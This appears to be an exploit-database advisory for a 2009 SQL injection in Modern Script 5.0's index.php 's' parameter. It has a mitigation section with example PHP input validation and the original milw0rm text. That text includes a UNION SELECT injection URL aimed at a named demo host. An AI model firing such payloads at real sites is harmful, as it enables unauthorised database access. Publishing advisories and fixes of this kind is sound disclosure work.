Vendor: Modern Script
By: Red-D3v1L
CVSS: 7.5 (HIGH)
CWE: Remote SQL Injection
Product Name: Modern Script
Affected Version From: Modern Script 5.0
Affected Version To: Modern Script 5.0
Patch Exists: NO
Platforms Tested:
2009

Modern Script 5.0 Remote SQL Injection Vulnerability

The Modern Script 5.0 index.php file is vulnerable to a remote SQL injection attack. By manipulating the 's' parameter in the URL, an attacker can execute arbitrary SQL queries on the database.

Mitigation:

To mitigate this vulnerability, the vendor should release a patch that properly sanitizes user input in the 's' parameter.
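
One way such a fix can look, added here as an example and not Modern Script's own code. It assumes `s` is meant to be a numeric id (the page does not say so); the `sections` table, its columns and both function names are hypothetical.

```php
<?php
// Added example: strict validation of 's' plus a bound query parameter.
declare(strict_types=1);

/** Accept only a plain positive decimal id; anything else yields null. */
function parse_section_id($raw): ?int
{
    if (!is_string($raw) || !preg_match('/\A[0-9]{1,9}\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

/** Look up one row with a bound parameter, so the value never becomes SQL text. */
function fetch_section(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, title FROM sections WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database, so this runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE sections (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO sections (id, title) VALUES (182, 'News')");

// Constructed inputs: a normal id, then the shape of value shown in the advisory,
// then two malformed values. In index.php the raw value would be $_GET['s'] ?? null.
$samples = ['182', '-182 union select version(),2--', '182 ', ''];
foreach ($samples as $raw) {
    $id = parse_section_id($raw);
    if ($id === null) {
        // Reject before any database access; a real handler would answer HTTP 400.
        echo json_encode($raw), " => rejected\n";
        continue;
    }
    $row = fetch_section($db, $id);
    echo json_encode($raw), ' => ', $row ? $row['title'] : 'not found', "\n";
}
```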

Exploit-DB raw data:

/ ___   )(  __   )/ ___   )
\/   )  || (  )  |\/   )  |
    /   )| | /   |    /   )
   /   / | (/ /) |   /   / 
  /   /  |   / | |  /   /  
 /   (_/\|  (__) | /   (_/\
(_______/(_______)(_______/
       
==============================================================================
        [»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [»]  Modern Script <== 5.0 (index.php s) Remote SQL Injection Vulnerability
==============================================================================
    [»] my home:             [ Hackteach.org ]
    [»] Script:              [ Modern Script 5.0 ]
    [»] Language:            [ PHP ]
    [»] Home:                [ http://cmsdemo.enterbt.hu/modern5 ]
    [»] Founder:             [ Red-D3v1L < php-c0de@hotmail.com > SQL@Hotmail.eS < ]
    [»] Gr44tz to:           [ Hackteach Team -  Sniper-Code - j0rd4n14n.r1z - The-g0bL!N - G-z3r0 ]
    [»] Fuck to :            [ Lito << Big Lamerz Sux << And Donky 5acker << n00bZ ]
########################################################################

===[ Exploit SQL ]===  

 [»] [Path]/index.php?s=[SQL]

 [»] Live dem0 : 

http://cmsdemo.enterbt.hu/modern5/index.php?s=-182+union+select+version(),2--


Author: Red-D3v1L <-

###########################################################################

# milw0rm.com [2009-08-31]